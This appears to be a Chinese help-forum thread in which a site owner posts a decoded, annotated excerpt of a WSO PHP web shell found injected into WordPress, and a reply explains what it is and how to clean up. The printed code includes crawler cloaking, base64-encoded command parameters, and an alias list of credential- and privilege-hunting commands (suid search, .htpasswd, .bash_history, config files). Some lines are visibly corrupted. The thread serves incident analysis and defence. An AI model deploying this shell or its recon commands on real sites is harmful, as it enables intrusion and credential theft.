



这段代码是从被注入到 WordPress 目录中的一个 PHP 文件里提取出来的。经过几层 base64 解码和解压缩之后，我得到了下面这段内容（部分行在粘贴时已经损坏，例如大括号丢失、`.php` 被改写成 `.PHP`）：

<?PHP ?><?PHP
/* Reject search engines */
// Analyst note: crawler cloaking. Any request whose User-Agent matches one of the
// listed crawlers gets an HTTP 404, so the shell stays out of search-engine caches
// and simple scanner results. The closing braces of these two `if` blocks were lost
// when the listing was pasted, and the rest of the file is cut off below.
if (!empty($_SERVER['HTTP_USER_AGENT'])) {
    $userAgents = array('Google','Slurp','MSNBot','ia_archiver','Yandex','Rambler');
    if (preg_match('/' . implode('|',$userAgents) . '/i',$_SERVER['HTTP_USER_AGENT'])) {
        header('HTTP/1.0 404 Not Found');
/* Settings */
// Only UI colour and output charset are set here; no $auth_pass appears anywhere in
// this excerpt (see the authentication gate below for what that implies).
$color = '#12ff4f';
$default_charset = 'Windows-1251';
/* Shell Setup */
/*More Shell SetuP*/
// Undo magic_quotes so operator-supplied POST/COOKIE values arrive without added slashes.
if (get_magic_quotes_runtime()) @set_magic_quotes_runtime(0);
if (get_magic_quotes_gpc()) {
    // Recursively stripslashes() a string or a nested array.
    function WSOstripslashes($arr) {
        return is_array($arr) ? array_map('WSOstripslashes',$arr) : stripslashes($arr);
    $_POST = WSOstripslashes($_POST);
    $_COOKIE = WSOstripslashes($_COOKIE);
// Recursively base64_decode() a string or a nested array. It is applied to the whole of
// $_POST further down, so every parameter the operator sends travels base64-encoded
// (plain-text commands do not show up in WAF rules or access-log greps).
function WSOb64decode($arr) {
    return is_array($arr) ? array_map('WSOb64decode',$arr) : base64_decode($arr);
// Only writes into the $_COOKIE superglobal; no Set-Cookie header is sent. The "login"
// therefore only exists for the current request, which is all the gate below needs.
function WSOsetcookie($k,$v) {
    $_COOKIE[$k] = $v;
// Authentication gate. The whole block is skipped when $auth_pass is empty -- and this
// excerpt never sets it, so unless it is defined in the part of the file not shown, this
// copy is effectively unauthenticated.
// Detection indicators: the cookie name is md5($_SERVER['HTTP_HOST']) (a bare 32-hex-char
// cookie name) and its value is base64 of the plaintext password. The check compares
// sha1() hex strings with loose == / != (PHP type juggling applies to such comparisons).
if (!empty($auth_pass)) {
    if (isset($_POST['pass']) && (sha1($_POST['pass']) == $auth_pass)) WSOsetcookie(md5($_SERVER['HTTP_HOST']),base64_encode($_POST['pass']));
    if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) ]) || (sha1(base64_decode($_COOKIE[md5($_SERVER['HTTP_HOST']) ])) != $auth_pass)) die('<form method=post>Password: <input type=password name=pass><input type=submit value=">>"></form>');
// From here on every POST parameter has already been base64-decoded.
$_POST = WSOb64decode($_POST);
// OS detection. As pasted, substr(PHP_OS,3) drops the first three characters, so a
// PHP_OS of "WINNT" yields "NT" and never matches 'win'; an offset argument was most
// likely lost in the paste (NOTE(review): not verified against the full file).
$os = (strtolower(substr(PHP_OS,3)) == 'win') ? 'win' : 'nix';
$safe_mode = @ini_get('safe_mode');
// Silence all PHP errors unless safe_mode is on -- keeps the shell out of the error log.
if (!$safe_mode) error_reporting(0);
$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
// Operator-controlled working directory: POST parameter 'c' (base64-decoded above).
if (isset($_POST['c'])) @chdir($_POST['c']);
$cwd = @getcwd();
if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'])) $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = true;
// Quick-command menu for *nix targets: privilege-escalation and credential recon
// (suid/sgid binaries, world-writable paths, config*/.htpasswd/.bash_history/
// .fetchmailrc, listening ports, process list). These are the exact commands to expect
// in shell/auditd history once the operator is active. The ".PHP" and ".MysqL" spellings
// are almost certainly an artefact of the hosting site's text rewriting; the real
// filenames are lower-case (config.inc.php, .mysql_history).
$aliases = array('List dir' => 'ls -lha','list file attributes on a Linux second extended file system' => 'lsattr -va','show opened ports' => 'netstat -an | grep -i listen','process status' => 'ps aux','Find' => '','find suid' => 'find / -type f -perm -04000 -ls','find suid in current dir' => 'find . -type f -perm -04000 -ls','find sgid' => 'find / -type f -perm -02000 -ls','find sgid files in current dir' => 'find . -type f -perm -02000 -ls','find config.inc.PHP' => 'find / -type f -name config.inc.PHP','find config*' => 'find / -type f -name "config*"','find config* in current dir' => 'find . -type f -name "config*"','find writable folders and files' => 'find / -perm -2 -ls','find writable folders and files in current dir' => 'find . -perm -2 -ls','find service.pwd' => 'find / -type f -name service.pwd','find service.pwd files in current dir' => 'find . -type f -name service.pwd','find .htpasswd' => 'find / -type f -name .htpasswd','find .htpasswd files in current dir' => 'find . -type f -name .htpasswd','find .bash_history' => 'find / -type f -name .bash_history','find .bash_history files in current dir' => 'find . -type f -name .bash_history','find .fetchmailrc' => 'find / -type f -name .fetchmailrc','find .fetchmailrc files in current dir' => 'find . 
-type f -name .fetchmailrc','Locate' => '','locate httpd.conf' => 'locate httpd.conf','locate vhosts.conf' => 'locate vhosts.conf','locate proftpd.conf' => 'locate proftpd.conf','locate psybnc.conf' => 'locate psybnc.conf','locate my.conf' => 'locate my.conf','locate admin.PHP' => 'locate admin.PHP','locate cfg.PHP' => 'locate cfg.PHP','locate conf.PHP' => 'locate conf.PHP','locate config.dat' => 'locate config.dat','locate config.PHP' => 'locate config.PHP','locate config.inc' => 'locate config.inc','locate config.inc.PHP' => 'locate config.inc.PHP','locate config.default.PHP' => 'locate config.default.PHP','locate config*' => 'locate config','locate .conf' => 'locate ".conf"','locate .pwd' => 'locate ".pwd"','locate .sql' => 'locate ".sql"','locate .htpasswd' => 'locate ".htpasswd"','locate .bash_history' => 'locate ".bash_history"','locate .MysqL_history' => 'locate ".MysqL_history"','locate .fetchmailrc' => 'locate ".fetchmailrc"','locate backup' => 'locate backup','locate dump' => 'locate dump','locate priv' => 'locate priv');
if ($os == 'win') {
    // Windows variant. This line is corrupted in the paste: str_replace('\',' / ',...) is
    // not valid PHP and the alias keys have lost their spaces. The evident intent is to
    // normalise backslashes to forward slashes and swap in dir / netstat / net start /
    // net user / net view / arp / ipconfig aliases.
    $home_cwd = str_replace('\',' / ',$home_cwd);$cwd=str_replace('\',$cwd);$aliases=array('ListDirectory'=>'dir','Findindex . PHPincurrentdir'=>'dir / s / w / bindex . PHP','Find * config * . PHPincurrentdir'=>'dir / s / w / b * config * . PHP','Showactiveconnections'=>'netstat - an','Showrunningservices'=>'netstart','Useraccounts'=>'netuser','Showcomputers'=>'netview','ARPTable'=>'arp - a','IPConfiguration'=>'ipconfig / all');}
// Ensure $cwd ends with a path separator (the three-character ' / ' literal is another
// paste artefact; a single '/' is what the comparison against one character implies).
if($cwd[strlen($cwd)-1]!=' / ')$cwd.=' / ';
// Provide no-op posix_getpwuid/posix_getgrgid stubs when the POSIX extension is absent,
// but only if the name is not in disable_functions (presumably because redefining a
// disabled function would error out -- not verified here).
if(!function_exists('posix_getpwuid')&&(strpos($GLOBALS['disable_functions'],'posix_getpwuid')===false)){function posix_getpwuid($p){return false;}}
if(!function_exists('posix_getgrgid')&&(strpos($GLOBALS['disable_functions'],'posix_getgrgid')===false)){function posix_getgrgid($p){return false;}}

... [full code in pastebin]                                                            

Full Code Pastebin

感谢您的理解! 谢谢



您贴出的这段代码，就恶意载荷而言已经相当易读了。通常这类载荷会被多层编码或“混淆”，几乎无法直接阅读，同时也让杀毒/扫描软件难以匹配特征。不过即使不逐行分析，也能看出它会输出一个 HTML 表单，并允许执行文件和目录操作命令。这是一个 Web Shell（非常常见的一类载荷）——即一个由网页驱动的应用，攻击者可以通过它浏览你的文件系统并执行命令。从辅助函数的 `WSO` 前缀（`WSOstripslashes`、`WSOb64decode`、`WSOsetcookie`）来看，它属于 WSO 系列 Web Shell。从代码里可以直接读出几个有用的特征：所有 POST 参数在使用前都会先做 base64 解码（所以访问日志里看不到明文命令）；登录态保存在一个名为 `md5($_SERVER['HTTP_HOST'])` 的 Cookie 中（一个 32 位十六进制的 Cookie 名）；对常见搜索引擎爬虫的 User-Agent 直接返回 404 以躲避收录；此外这个片段里并没有设置 `$auth_pass`，如果完整文件里也没有，那么这个 Shell 实际上是无需密码即可使用的。处置时请注意：Web Shell 只是攻击者留下的持久化手段，不是入口本身——删除它之后还需要找出最初的入侵途径（过期的插件/主题、被盗的凭据等），检查是否还有其他被注入或被篡改的文件，并更换相关密码和密钥。


我曾经被人开价每月 5000 美元，让我去入侵 WordPress 网站，因为（据那人声称）接管网站之后他就能从这些网站上赚取广告收入。显然，这是一门有利可图的生意。

